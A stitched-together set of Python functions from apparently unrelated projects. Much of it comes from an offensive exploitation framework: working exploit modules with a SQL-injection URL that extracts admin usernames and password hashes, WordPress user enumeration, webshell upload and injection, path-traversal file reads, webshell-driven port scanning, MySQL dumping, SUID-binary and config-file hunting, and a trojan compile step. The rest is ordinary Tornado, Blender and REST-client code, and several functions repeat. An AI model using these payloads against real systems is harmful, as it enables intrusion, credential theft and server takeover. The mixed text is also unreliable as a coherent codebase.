def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
Log.info("Lauching the exploition...")
host = self.get_config("remote_host")
port = self.get_config("remote_port")
url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''')
Log.info("Url: %s" % (url))
try:
response = requests.get(url)
if response.status_code == 200:
content = response.content
if "<h2>" not in content:
Log.error("Exploit Failed!")
return False
data = response.content.split("<h2>")[1].split("</h2>")[0].split("\\|")
if len(data) != 2:
Log.error("Exploit Failed!")
return False
Log.success("Exploit success!")
username = data[0]
password = data[1]
print "%s" % (color.cyan("Username\tHash"))
print "%s" % (color.blue("%s\t%s" % (username, password)))
return True
else:
return False
except Exception as e:
Log.error(str(e))
return False
class Library(object):
def __init__(self, library):
self._library = library
self._asset = None # Asset cache
self.log = Log()
self.snapshot = connections.Connector()
def __repr__(self):
return self._library.filepath
@property
def asset(self):
import os
# Figure out what asset this library refers to
if not self._asset:
filepath = os.path.split(self._library.filepath)[0]
# Get the asset data associated with this linked library
code = os.path.normpath(filepath).split(os.path.sep)[-1:][0]
type_secondary = os.path.normpath(filepath).split(
os.path.sep)[-2:-1][0]
type_primary = os.path.normpath(filepath).split(
os.path.sep)[-3:-2][0]
show = os.path.normpath(filepath).split(os.path.sep)[-4:-3][0]
self.log.info(", ".join([show, type_primary, type_secondary,
code]))
self._asset = self.snapshot.asset(code=code,
type_primary=type_primary,
type_secondary=type_secondary,
show=show)
return self._asset
@property
def filepath(self):
return self._library.filepath
def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
Log.info("Lauching the exploition...")
host = self.get_config("remote_host")
port = int(self.get_config("remote_port"))
url = "http://%s:%d/wp-json/wp/v2/users/" % (host, port)
try:
response = requests.get(url)
if response.status_code == 200:
Log.success("Exploit success!")
content = response.content
print "%s" % (color.cyan("ID\tUser\t\tDescription"))
for user in json.loads(content)[::-1]:
username = user["name"]
if len(username) > 8:
print "%s\t%s\t%s" % (user["id"], user["name"],
user["description"])
else:
print "%s\t%s\t\t%s" % (user["id"], user["name"],
user["description"])
return True
else:
Log.error("Exploit Failed!")
return False
except Exception as e:
Log.error(str(e))
return False
def exploit(self):
remote_host = self.get_config("remote_host")
remote_port = int(self.get_config("remote_port"))
password = self.get_config("shell_pwd")
webshell = self.get_config("webshell").replace("__PASSWORD__",
password)
url = "http://%s:%d/index.php?s=/Core/File/uploadPictureBase64.html" % (
remote_host, remote_port)
data = {
'data':
'data:image/php;base64,%s' %
(webshell.encode("base64").replace("\n", ""))
}
Log.info("Data: %s" % (data))
response = requests.post(url, data=data)
content = response.content
if content.startswith("{\"status\":") and content.endswith(".php\"}"):
Log.success("Exploit successfully!")
Log.success(success_json)
success_json = json.loads(content)
self.webshell_url = success_json['path'].replace("\\/", "/")
if self.get_config(interactive) == True:
self.interactive()
return True
Log.error("Exploit failed!")
return False
def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
host = self.get_config("remote_host")
port = self.get_config("remote_port")
file = self.get_config("file")
if not self.login():
Log.error("Login failed!")
return False
Log.success("Login successful!")
url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (
host, port, file)
try:
response = self.session.get(url)
if response.status_code == 200:
Log.success("Exploit success!")
Log.info(">>>>>> %s <<<<<<" % (file))
print("%s" % color.blue(response.content))
return True
else:
return False
except Exception as e:
Log.error(str(e))
return False
def save(self, button):
Log.info('Clicked save button', origin='AddProjectForm')
self.backend.new_project(name=self.name_entry.get_text(),
description=self.description_entry.get_text())
# TODO: update the project tree view
replace_widget(self, self.previous_widget)
self.window.update_from_backend()
class Library(object):
def __init__(self, library):
self._library = library
self._asset = None # Asset cache
self.log = Log()
self.snapshot = connections.Connector()
def __repr__(self):
return self._library.filepath
@property
def asset(self):
import os
# Figure out what asset this library refers to
if not self._asset:
filepath = os.path.split(self._library.filepath)[0]
# Get the asset data associated with this linked library
code = os.path.normpath(filepath).split(os.path.sep)[-1:][0]
type_secondary = os.path.normpath(filepath).split(os.path.sep)[-2:-1][0]
type_primary = os.path.normpath(filepath).split(os.path.sep)[-3:-2][0]
show = os.path.normpath(filepath).split(os.path.sep)[-4:-3][0]
self.log.info(", ".join([show, type_primary, type_secondary, code]))
self._asset = self.snapshot.asset(
code=code, type_primary=type_primary, type_secondary=type_secondary, show=show
)
return self._asset
@property
def filepath(self):
return self._library.filepath
def post(self):
oname = self.get_username()
ipAddress = self.get_argument("ipAddress", None)
ename = self.get_argument("ename", None)
tusername = self.get_argument("tusername", None)
tpassword = self.get_argument("tpassword", None)
if not tusername or not tpassword:
# do something
self.flash.error = "You must enter a username and password to proceed. Please try again."
self.redirect("/add_exchange")
return
if tpassword != self.get_argument("tpassword2", None):
self.flash.error = "Passwords do not match. Please try again."
self.redirect("/add_exchange")
return
Exchange.insert(ename, oname, ipAddress)
rpc = TelnetRpcClient(options.service_ip)
msg = json.dumps({'fileadd':options.telnet_key_dir, \
'ipadd':ipAddress,'username':tusername,"password":tpassword})
from util import encrypt_util
encoded = encrypt_util.encode(msg)
response = rpc.call("key_queue", encoded)
Log.info(response)
##加密传输入保存
self.redirect("/get_exchanges")
def auto_inject_phpfile(self, filename, webshell_content):
Log.info("Auto injecting : [%s] => [%s]" %
(filename, repr(webshell_content)))
Log.info("Code : [%s]" % (repr(webshell_content)))
Log.info("Length : [%d]" % (len(webshell_content)))
Log.info("Getting writable dirs...")
writable_dirs = self.get_writable_directory()
if len(writable_dirs) == 0:
Log.error("No writable dirs...")
return False
else:
for writable_dir in writable_dirs:
Log.info("Writing [%s] into : [%s]" %
(repr(webshell_content), writable_dir))
php_code = "file_put_contents('%s',base64_decode('%s'));" % (
"%s/%s" % (writable_dir, filename),
webshell_content.encode("base64").replace("\n", ""))
self.php_code_exec(php_code)
base_url = "%s%s" % ("".join([
"%s/" % (i) for i in self.url.split("/")[0:3]
]), writable_dir.replace("%s" % (self.webroot), ""))
webshell_url = "%s/%s" % (base_url, filename)
with open("Webshell.txt", "a+") as f:
log_content = "%s => %s\n" % (webshell_url,
repr(webshell_content))
f.write(log_content)
return webshell_url
def read_file(self, filepath):
Log.info("Reading file : [%s] ..." % (filepath))
result = self.php_code_exec_token("echo file_get_contents('%s');" % filepath)
if result[0]:
Log.success("Content : \n%s" % (result[1]))
else:
Log.error("Error occured! %s" % result[1])
def check_working(self, url, method, auth):
Log.info("Checking whether the webshell is still work...")
key = random_string(6, string.letters)
value = random_string(32, string.letters)
token = random_string(32, string.letters)
Log.info("Using challenge key : [%s] , value : [%s]" % (key, value))
Log.info("Using token : [%s]" % (token))
method = string.upper(method)
if method == "POST" or method == "REQUEST":
Log.info("Using POST method...")
data = {
auth:
'echo "' + token + '";var_dump("$_POST[' + key + ']");echo "' +
token + '";',
key:
value
}
response = requests.post(url, data=data)
elif method == "GET":
Log.info("Using GET method...")
params = {
auth:
'echo "' + token + '";var_dump("$_POST[' + key + ']");echo "' +
token + '";'
}
url = build_url(url, params)
data = {key: value}
response = requests.post(url, data=data)
else:
Log.error("Unsupported method!")
return False
content = response.content
Log.success("The content is :\n " + content)
return value in content
def post(self):
oname = self.get_username()
ipAddress = self.get_argument("ipAddress", None)
ename = self.get_argument("ename", None)
tusername = self.get_argument("tusername", None)
tpassword = self.get_argument("tpassword", None)
if not tusername or not tpassword:
# do something
self.flash.error = "You must enter a username and password to proceed. Please try again."
self.redirect("/add_exchange")
return
if tpassword != self.get_argument("tpassword2", None) :
self.flash.error = "Passwords do not match. Please try again."
self.redirect("/add_exchange")
return
Exchange.insert(ename,oname,ipAddress)
rpc = TelnetRpcClient(options.service_ip)
msg = json.dumps({'fileadd':options.telnet_key_dir, \
'ipadd':ipAddress,'username':tusername,"password":tpassword})
from util import encrypt_util
encoded = encrypt_util.encode(msg)
response = rpc.call("key_queue",encoded)
Log.info(response)
##加密传输入保存
self.redirect("/get_exchanges")
def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
Log.info("Lauching the exploition...")
remote_host = self.get_config("remote_host")
remote_port = self.get_config("remote_port")
username = self.get_config("admin_user")
password = self.get_config("admin_pwd")
webshell_password = self.get_config("shell_pwd")
prefix = self.get_config("plug_prefix")
filename = self.get_config("shell_file")
webshell = self.get_config("webshell")
if not check_prefix(prefix):
return False
if not self.login():
Log.error("Login failed!")
Log.error("Please check your username and password")
return False
Log.success("[+] Login success!")
Log.info("[+] Sending payload...")
try:
url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
remote_host, remote_port)
data = {
"app_id":
"%s'.%s.'" %
(prefix, webshell.replace("__PASSWORD__", webshell_password)),
"app_path":
filename,
}
response = self.session.post(url, data=data)
content = response.content
except Exception as e:
Log.error(str(e))
return False
if "已存在同名的APP应用" in content:
Log.error("PlugIn name has been used! Please change the prefix!")
Log.error("Exploit failed!")
return False
elif len(content) == 0:
self.webshell_url = "http://%s:%d/zb_users/plugin/%s'.%s.'/%s" % (
remote_host, remote_port, prefix,
webshell.replace("__PASSWORD__", webshell_password), filename)
Log.success("Exploit success!")
Log.success("Enjoy your shell :")
Log.success("Url : %s" % (self.webshell_url))
Log.success("Pas : c")
Log.success("Remember to die() it!")
self.interactive()
return True
else:
Log.error("Unknown error!")
Log.error("Exploit failed!")
return False
def port_scan(self, hosts, ports):
Log.info("Starting port scan... %s => [%s]" % (hosts, ports))
code = "set_time_limit(0);error_reporting(0);$ports_input='%s';$hosts_input='%s';$timeout=0.5;$ports=explode(',', $ports_input);$hosts_array=explode('/', $hosts_input);$ip=ip2long($hosts_array[0]);$net_mask=intval($hosts_array[1]);$range=pow(2, (32 - $net_mask));$start=$ip >> (32 - $net_mask) << (32 - $net_mask);for ($i=0;$i < $range;$i++) {$h=long2ip($start + $i);foreach ($ports as $p) {$c=@fsockopen($h, intval($p), $en, $es, $timeout);if (is_resource($c)) {echo $h.':'.$p.' => open\n';fclose($c);} else {echo $h.':'.$p.' => '.$es.'\n';}ob_flush();flush();}}" % (ports, hosts)
Log.info("Executing : \n%s" % code)
result = self.php_code_exec_token(code)
if result[0]:
Log.success("Result : \n%s" % (result[1]))
else:
Log.error("Error occured! %s" % result[1])
def compile_trojan(tname,ip):
Log.info("Compiling trojan...")
try:
if not os.system("cd trojan;sed -i 's/XXXXXXX/%s/g' backdoor.c ;gcc -o %s backdoor.c -lpthread -g" % (ip ,tname)):
return True
else:
return False
except:
Log.error(traceback.print_exc())
return False
def download(self, remote_file_path, local_file_path):
root = get_domain(self.url)
path = root + local_file_path
Log.info("Local path : [%s]" % (path))
local_directory = path[0:-path[::-1].index("/")]
Log.info("Creating : [%s]" % (local_directory))
try:
os.makedirs(local_directory)
except Exception as e:
Log.error(str(e))
self.download_base(remote_file_path, path)
def show_info(self):
'''
模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等
该函数在模块被加载的时候自动调用
需要将其中的信息修改为对应的模块信息
'''
Log.info("Name: Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)")
Log.info("Effected Version: 2.6.22 < 3.9 (x86/x64)")
Log.info("Author: Robin Verton")
Log.info("Refer:")
Log.info("\thttps://www.exploit-db.com/exploits/40616/")
def sql_exec(self, sql):
# TODO 数据显示不完整的 BUG
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$s='%s';$r=$c->query($s);while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password, sql)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
Log.success(content.split(",")[0])
else:
Log.error("Error occured!")
def get_columns_from_table(self, tablename, database):
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('%s');$s='select column_name from information_schema.columns where table_name = \"%s\"';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password, database, tablename)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
columns = content.split(",")[0:-1]
Log.success("Columns : \n" + list2string(columns, "=> [", "]\n"))
else:
Log.error("Error occured!")
def save_webshells(webshells, filename):
data = []
for webshell in webshells:
config = {
"url": webshell.url,
"method": webshell.method,
"password": webshell.password
}
Log.info("Saving : %s" % (config))
data.append(config)
json.dump(data, open(filename, "w"))
def is_directory(self, filename):
Log.info("Checking file exists : [%s]" % filename)
result = self.php_code_exec_token("var_dump(is_dir('%s'));" % (filename))
if result[0]:
Log.error("Checking finished successfully!")
content = result[1]
if "bool(true)" in content:
Log.success("File (%s) is existed!" % (filename))
return True
return False
else:
Log.error("Some error occured while checking!")
return False
def get_config_file(self):
keywords = ["config", "db", "database"]
for key in keywords:
Log.info("Using keyword : [%s]..." % (key))
command = "find %s -name '*%s*'" % (self.webroot, key)
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
else:
Log.success("Found : \n%s" % output[1])
else:
Log.error("Error occured! %s" % output[1])
def get_suid_binaries(self):
paths = ['/usr/local/sbin', '/usr/local/bin', '/usr/sbin', '/usr/bin', '/sbin', '/bin', '/usr/games', '/usr/local/games', '/snap/bin']
for path in paths:
command = "find %s -user root -perm -4000 -exec ls -ldb {} \;" % (path)
Log.info("Executing : %s" % (command))
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
else:
Log.success("Found : \n%s" % output[1])
else:
Log.error("Error occured! %s" % output[1])
def check_connection(self, url):
Log.info("Checking the connection to the webshell...")
try:
response = requests.head(url)
code = response.status_code
if code != 200:
Log.warning("The status code is %d, the webshell may have some problems..." % (response.status_code))
else:
Log.success("The status code is %d" % (response.status_code))
return True
except:
Log.error("Connection error!")
return False
def set_bandwidth_job():
from models.order import Order
from models.product import Product
from models.exchange import Exchange
from client.rpc_client import TelnetRpcClient
from tornado.options import options
import json
from util import encrypt_util
Log.info(" [x] Requesting")
Log.info('set_bandwidth_job start at ', datetime.datetime.now())
need_do = ''
Log.info("请异步发送")
orders = Order.get_working_orders()
for order in orders:
product = Product.lookup(order['p_id'])
exchange = Exchange.lookup(product['e_id'])
need_do = need_do+json.dumps({'switch_name':exchange['ename'],"vlan":product['vlan'], \
"port_name":product['port'], "host":exchange['ipAddress'], \
"bandwidth":order['bandwidth']})
Order.finish_order(order['_id'])
need_back=''
orders = Order.get_back_orders()
for order in orders:
product = Product.lookup(order['p_id'])
exchange = Exchange.lookup(product['e_id'])
need_back = need_back+json.dumps({'switch_name':exchange['ename'],"vlan":product['vlan'], \
"port_name":product['port'], "host":exchange['ipAddress'], \
"bandwidth":order['bandwidth']})
Order.back_order(order['_id'])
orders = {}
flag = False
if(need_do!=''):
orders['need_do']=need_do
flag = True
if(need_back!=''):
orders['need_back']=need_back
flag = True
if(flag!=True):
rpc = TelnetRpcClient(options.service_ip)
encoded = encrypt_util.encode(str(orders))
response = rpc.call("rpc_queue",encoded)
Log.info('set_bandwidth_job end at ', datetime.datetime.now())
Log.info(response)
# rpc = TelnetRpcClient('192.168.0.2')
# orders = Order.get_working_orders()
# for order in orders:
# product = Product.lookup(order['p_id'])
# exchange = Exchange.lookup(product['e_id'])
# response = rpc.call(json.dumps({'switch_name':'TelnetManage3560', "vlan":product['vlan'],
# "port_name":product['port'], "host":exchange['ipAddress'], "bandwidth":product['ctype']*order['percent']/100}))
print 'set_bandwidth_job end at ', datetime.datetime.now()
def interactive(self):
self.help()
while True:
Log.context("sniper")
Log.context("mysql")
command = string.lower(raw_input("=>") or "h")
if command == "h":
self.help()
elif command == "cd":
self.get_currect_database()
elif command == "u":
self.get_currect_user()
elif command == "v":
self.get_version()
elif command == "d":
self.get_databases()
elif command == "t":
self.get_databases()
database = self.database
if database == "":
database = raw_input("Input database name : ")
if database == "":
Log.error(
"No database selected! Please input : [cd] command!")
self.get_table_from_database(database)
elif command == "c":
self.get_databases()
database = self.database
if database == "":
database = raw_input("Input database name : ")
if database == "":
Log.error(
"No database selected! Please input : [cd] command!")
continue
self.get_table_from_database(database)
table = raw_input("Input table name : ")
if table == "":
Log.error("No tablename inputed!")
continue
self.get_columns_from_table(table, database)
elif command == "e":
sql = raw_input("Input your sql : ") or "select @@version;"
Log.info("Executing sql : [%s]" % (sql))
self.sql_exec(sql)
elif command == "q":
Log.info("Quiting...")
break
else:
Log.error("Unsupported command!")
self.help()
def interactive(self):
Log.info("Starting interactive shell...")
while True:
Log.context("sniper")
Log.context("shell")
command = raw_input("$ ")
if string.lower(command) == "exit":
Log.info("Exiting shell...")
break
result = self.webshell.auto_exec(command)
if result[0]:
Log._print(result[1])
else:
Log.error(result[1])
def check_connection(self, webshell):
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new mysqli($h,$u,$p);if(mysqli_connect_error()){echo mysqli_connect_error();}$c->close();" % (
self.ip, self.username, self.password)
Log.info("Executing : \n%s" % code)
result = webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
if content == "":
return True
else:
Log.error("Error: %s" % (content))
return False
else:
return False
def download_advanced(self, path, args):
root = get_domain(self.url)
# List all dir and create them
directories = self.get_all_directories(path)
Log.success("Directories : \n%s" %
list2string(directories, "\t[", "]\n"))
Log.info("Create directories locally...")
for d in directories:
p = root + d
Log.info("Creating : [%s]" % (p))
try:
os.makedirs(p)
except Exception as e:
Log.error(str(e))
# Download
Log.info("Listing all files...")
result = self.auto_exec("find %s %s" % (path, args))
if result[0]:
Log.success("Listing files success!")
content = result[1].split("\n")[0:-1]
for file in content:
p = root + file
Log.info("Downloading %s to %s" % (file, p))
self.download_base(file, p)
else:
Log.error("Listing files error!")
def get(self):
oname = self.get_username()
template_values = {}
#page info
page = self.get_argument('page', 1)
page = page if page >= 1 else 1
#get the document count param
count = self.get_argument('count', 10)
count = count if count >= 1 else 10
Log.info("got some exchange massage")
exchanges = Exchange.get_exchanges(oname)
paginator = Paginator(exchanges, page, count, len(exchanges))
template_values['paginator'] = paginator
template_values['status'] = ''
self.render_template('/site/exchange.html', **template_values)
def get_version(self):
if self.version != "":
Log.success(self.version)
return
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$s='select version()';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
version = content.split(",")[0]
self.version = version
Log.success(version)
else:
Log.error("Error occured!")
def get(self):
oname = self.get_username()
template_values = {}
#page info
page = self.get_argument('page', 1)
page = page if page >= 1 else 1
#get the document count param
count = self.get_argument('count', 10)
count = count if count >= 1 else 10
Log.info("got some exchange massage")
exchanges = Exchange.get_exchanges(oname)
paginator = Paginator(exchanges, page, count, len(exchanges))
template_values['paginator'] = paginator
template_values['status'] = ''
self.render_template('/site/exchange.html', **template_values)
def get_databases(self):
if len(self.databases) != 0:
Log.success("Database : \n" +
list2string(self.databases, "=> [", "]\n"))
return
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('information_schema');$s='select schema_name from information_schema.schemata';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
databases = content.split(",")[0:-1]
self.databases = databases
Log.success("Database : \n" +
list2string(databases, "=> [", "]\n"))
else:
Log.error("Error occured!")
def main(self, path):
#import tornado stuff
import tornado.web, tornado.httpserver, tornado.ioloop, tornado.options
from tornado.options import options
from config import options_setup
from db.mongo import Mongo
#parse the app config
tornado.options.parse_config_file(os.path.join(path, 'config/settings.py'))
#parse the command line args
tornado.options.parse_command_line()
#connect to our db using our options set in settings.py
Mongo.create(host=options.db_host, port=options.db_port)
#init our url routes
url_routes = self.init_routes()
#init a logger
self.init_logging(options.log)
#add in any app settings
settings = {
"static_path": options.static_path,
"cookie_secret": options.cookie_secret,
"login_url": options.login_url,
}
#setup the controller action routes
#tornado.process.fork_processes(0)
self.application = tornado.web.Application(url_routes, **settings)
self.application.pika = PikaClient()
#instantiate a server instance
http_server = tornado.httpserver.HTTPServer(self.application)
#bind server to port
http_server.listen(options.port)
dss_jobs()
#log our start message
Log.info("Ready and listening")
#start the server
tornado.ioloop.IOLoop.instance().start()
def post(self):
e_id = self.get_argument('e_id')
e = Exchange.lookup(e_id)
tusername = self.get_argument('username')
newPw = self.get_argument('new_pw')
newPw2 = self.get_argument('new_pw_again')
if newPw != newPw2 :
self.flash.error = "Passwords do not match, please try again"
self.redirect("/exchange_up")
return
tpassword =newPw
rpc = TelnetRpcClient(options.service_ip)
msg = json.dumps({'fileadd':options.telnet_key_dir,'ipadd':e['ipAddress'],'username':tusername,"password":tpassword})
from util import encrypt_util
encoded = encrypt_util.encode(msg)
response = rpc.call("key_queue",encoded)
Log.info(response)
self.flash.success = "Successfully updated password"
self.redirect('/exchange_up')
def main(self, path):
#import tornado stuff
import tornado.web, tornado.httpserver, tornado.ioloop, tornado.options
from tornado.options import options
from config import options_setup
from db.mongo import Mongo
#parse the app config
tornado.options.parse_config_file(os.path.join(path, 'config/settings.py'))
#parse the command line args
tornado.options.parse_command_line()
#connect to our db using our options set in settings.py
Mongo.create(host=options.db_host, port=options.db_port)
#init our url routes
url_routes = self.init_routes()
#init a logger
self.init_logging(options.log)
#add in any app settings
settings = {
"static_path": options.static_path,
"cookie_secret": options.cookie_secret,
"login_url": options.login_url,
}
#setup the controller action routes
self.application = tornado.web.Application(url_routes, **settings)
#instantiate a server instance
http_server = tornado.httpserver.HTTPServer(self.application)
#bind server to port
http_server.listen(options.port)
#log our start message
Log.info("Ready and listening")
#start the server
tornado.ioloop.IOLoop.instance().start()
def post(self):
oname = self.get_username()
ename = self.get_argument("ename", None)
status = self.get_argument("status", None)
template_values = {}
#page info
page = self.get_argument('page', 1)
page = page if page >= 1 else 1
#get the document count param
count = self.get_argument('count', 10)
count = count if count >= 1 else 10
Log.info("got some exchange massage")
if status is not None:
template_values['status'] = status
else:
template_values['status'] = ''
exchanges = Exchange.get_condition_exchanges(oname,ename,template_values['status'])
paginator = Paginator(exchanges, page, count, len(exchanges))
template_values['paginator'] = paginator
template_values['ename'] = ename
self.render_template('/site/exchange.html', **template_values)#/site/bandwidth.html
class Playblast(object):
"""
This is a stand-in class that needs to be replaced - placeholder for now
"""
def __init__(self, asset):
self.asset = asset
self.log = Log()
def __str__(self):
return "%s - playblast" % asset.code
def execute(self):
"""
Do playblast here
:return:
"""
self.log.info("Playblasting %s" % self.asset.code)
@property
def movie(self):
return Movie(self)
def main(self):
import tornado.web
import tornado.httpserver
import tornado.ioloop
import tornado.options
from tornado.options import options
import config.options
from core.log import Log
from core.database import MongoDB
from utils.mail import Mailer
tornado.options.parse_config_file(os.path.join(os.path.dirname(__file__),'config/settings.py'))
tornado.options.parse_command_line()
self.init_logging(options.log)
MongoDB.create(host=options.db_host, port=options.db_port)
Mailer.create_mailer()
url_routes = self.init_routes()
settings = dict(
template_path = options.template_dir,
static_path = options.static_path,
cookie_secret = options.cookie_secret,
login_url = '/login',
debug = options.debug
)
http_server = tornado.httpserver.HTTPServer(tornado.web.Application(url_routes, **settings))
http_server.listen(options.port)
Log.info("Ready and listening")
tornado.ioloop.IOLoop.instance().start()
class __Connector:
def __init__(self, root_url = settings.ROOT_URL):
self.root_url = root_url
self.urls = settings.URLS
self.users_url = "%s%susers/" %(self.root_url, find_key(self.urls, "users"))
self.preferences_url = "%s%spreferences/" %(self.root_url, find_key(self.urls, "preferences"))
self.show_url = "%s%sshow/" %(self.root_url, find_key(self.urls, "show"))
self.assets_url = "%s%sassets/" %(self.root_url, find_key(self.urls, "assets"))
self.versions_url = "%s%sversions/" %(self.root_url, find_key(self.urls, "versions"))
self.movies_url = "%s%smovies/" %(self.root_url, find_key(self.urls, "movies"))
self.images_url = "%s%simages/" %(self.root_url, find_key(self.urls, "images"))
self.companies_url = "%s%scompanies/" %(self.root_url, find_key(self.urls, "companies"))
self.layer_url = "%s%slayer/" %(self.root_url, find_key(self.urls, "layer"))
self.render_url = "%s%srender/" %(self.root_url, find_key(self.urls, "render"))
self.renderfarm_url = "%s%srenderfarm/" %(self.root_url, find_key(self.urls, "renderfarm"))
self.action_url = "%s%saction/" %(self.root_url, find_key(self.urls, "action"))
self.camera_url = "%s%scamera/" %(self.root_url, find_key(self.urls, "camera"))
self.group_url = "%s%sgroup/" %(self.root_url, find_key(self.urls, "group"))
self.material_url = "%s%smaterial/" %(self.root_url, find_key(self.urls, "material"))
self.scene_url = "%s%sscene/" %(self.root_url, find_key(self.urls, "scene"))
self.world_url = "%s%sworld/" %(self.root_url, find_key(self.urls, "world"))
self.session = requests.Session()
self.log = Log()
def __str__(self):
return self.root_url
#DJANGO APP: users
def users(
self,
users_url = None,
):
if not users_url:
users_url = self.users_url
query_strings = []
if query_strings:
users_url = "%s?%s" % (users_url, "&".join(query_strings))
self.log.info("Getting: %s" %users_url)
response = self.session.get(users_url)
if response.status_code == 200:
users = json.loads(response.text, object_hook = deserializers.decode_users)
return users
else:
self.log.info(users_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: shows
def preferences(
self,
preferences_url = None,
res_render_x = None,
res_render_y = None,
res_playblast_x = None,
res_playblast_y = None,
timebase = None,
codec = None,
p_drive = None,
p_drive_linux = None,
p_project = None,
p_render = None,
p_review = None,
p_comp = None,
p_media = None,
p_publish = None,
p_sandbox = None,
show = None,
):
if not preferences_url:
preferences_url = self.preferences_url
query_strings = []
if res_render_x: query_strings.append("res_render_x=%s" % res_render_x)
if res_render_y: query_strings.append("res_render_y=%s" % res_render_y)
if res_playblast_x: query_strings.append("res_playblast_x=%s" % res_playblast_x)
if res_playblast_y: query_strings.append("res_playblast_y=%s" % res_playblast_y)
if timebase: query_strings.append("timebase=%s" % timebase)
if codec: query_strings.append("codec=%s" % codec)
if p_drive: query_strings.append("p_drive=%s" % p_drive)
if p_drive_linux: query_strings.append("p_drive_linux=%s" % p_drive_linux)
if p_project: query_strings.append("p_project=%s" % p_project)
if p_render: query_strings.append("p_render=%s" % p_render)
if p_review: query_strings.append("p_review=%s" % p_review)
if p_comp: query_strings.append("p_comp=%s" % p_comp)
if p_media: query_strings.append("p_media=%s" % p_media)
if p_publish: query_strings.append("p_publish=%s" % p_publish)
if p_sandbox: query_strings.append("p_sandbox=%s" % p_sandbox)
if show: query_strings.append("show=%s" % show)
if query_strings:
preferences_url = "%s?%s" % (preferences_url, "&".join(query_strings))
self.log.info("Getting: %s" %preferences_url)
response = self.session.get(preferences_url)
if response.status_code == 200:
preferences = json.loads(response.text, object_hook = deserializers.decode_preferences)
return preferences
else:
self.log.info(preferences_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def show(
self,
show_url = None,
code = None,
name = None,
created = None,
modified = None,
company = None,
preferences = None,
assets = None,
):
if not show_url:
show_url = self.show_url
query_strings = []
if code: query_strings.append("code=%s" % code)
if name: query_strings.append("name=%s" % name)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if company: query_strings.append("company=%s" % company)
if preferences: query_strings.append("preferences=%s" % preferences)
if assets: query_strings.append("assets=%s" % assets)
if query_strings:
show_url = "%s?%s" % (show_url, "&".join(query_strings))
self.log.info("Getting: %s" %show_url)
response = self.session.get(show_url)
if response.status_code == 200:
show = json.loads(response.text, object_hook = deserializers.decode_show)
return show
else:
self.log.info(show_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: assets
def assets(
self,
assets_url = None,
type_primary = None,
type_secondary = None,
type_tertiary = None,
code = None,
description = None,
comment = None,
start_frame = None,
end_frame = None,
data = None,
stats_version = None,
stats_verts = None,
stats_faces = None,
stats_tris = None,
stats_objects = None,
stats_lamps = None,
stats_memory = None,
created = None,
modified = None,
images = None,
parents = None,
layers = None,
children = None,
movies = None,
renders = None,
show = None,
versions = None,
groups = None,
):
if not assets_url:
assets_url = self.assets_url
query_strings = []
if type_primary: query_strings.append("type_primary=%s" % type_primary)
if type_secondary: query_strings.append("type_secondary=%s" % type_secondary)
if type_tertiary: query_strings.append("type_tertiary=%s" % type_tertiary)
if code: query_strings.append("code=%s" % code)
if description: query_strings.append("description=%s" % description)
if comment: query_strings.append("comment=%s" % comment)
if start_frame: query_strings.append("start_frame=%s" % start_frame)
if end_frame: query_strings.append("end_frame=%s" % end_frame)
if data: query_strings.append("data=%s" % data)
if stats_version: query_strings.append("stats_version=%s" % stats_version)
if stats_verts: query_strings.append("stats_verts=%s" % stats_verts)
if stats_faces: query_strings.append("stats_faces=%s" % stats_faces)
if stats_tris: query_strings.append("stats_tris=%s" % stats_tris)
if stats_objects: query_strings.append("stats_objects=%s" % stats_objects)
if stats_lamps: query_strings.append("stats_lamps=%s" % stats_lamps)
if stats_memory: query_strings.append("stats_memory=%s" % stats_memory)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if images: query_strings.append("images=%s" % images)
if parents: query_strings.append("parents=%s" % parents)
